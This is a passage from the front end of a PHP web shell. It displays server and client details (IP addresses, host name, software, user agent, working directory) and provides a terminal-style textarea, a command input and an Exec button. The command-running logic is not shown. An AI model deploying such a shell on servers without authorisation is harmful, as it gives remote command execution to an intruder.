ServerIP: <?php echo $_SERVER['SERVER_ADDR']; ?> VHost: <?php echo htmlspecialchars($_SERVER['SERVER_NAME']); ?> YourIP: <?php if (empty($_SERVER['HTTP_X_FORWARDED_FOR'])) { echo htmlspecialchars($_SERVER['REMOTE_ADDR']); } else { echo htmlspecialchars($_SERVER['HTTP_X_FORWARDED_FOR']); } ?> Software: <?php echo htmlspecialchars($_SERVER['SERVER_SOFTWARE']); ?><br />UserAgent: <?php echo htmlspecialchars($_SERVER['HTTP_USER_AGENT']); ?><br />
|
|
Pwd: <?php echo htmlspecialchars($_SESSION['cwd'], ENT_COMPAT, 'UTF-8'); ?> <br />
|
|
ServerSig: <?php echo htmlspecialchars($_SERVER['SERVER_SIGNATURE'])?>
|
|
<div id="terminal">
|
|
<textarea name="output" readonly="readonly" cols="<?php echo $columns ?>" rows="<?php echo $rows ?>">
|
|
<?php
|
|
$lines = substr_count($_SESSION['output'], "\n");
|
|
$padding = str_repeat("\n", max(0, $rows+1 - $lines));
|
|
echo rtrim($padding . $_SESSION['output']);
|
|
?>
|
|
</textarea>
|
|
<p id="prompt">
|
|
$ <input name="cmd" type="text"
|
|
onkeyup="key(event)" size="<?php echo $columns-2 ?>" tabindex="1">
|
|
</p>
|
|
</div>
|
|
|
|
<p>
|
|
<span style="float: right">Size: <input type="text" name="rows" size="2"
|
|
maxlength="3" value="<?php echo $rows ?>"> × <input type="text"
|
|
name="columns" size="2" maxlength="3" value="<?php echo $columns
|
|
?>"></span>
|
|
|
|
<input type="submit" value="Exec">
|
|
<input type="submit" name="logout" value="Logout">
|
|
</p>
|
|
|
|
</fieldset>
|
|
|
|
<?php } ?>
|
|
|
|
</form>
|
|
|
|
</body>
|
|
</html>
|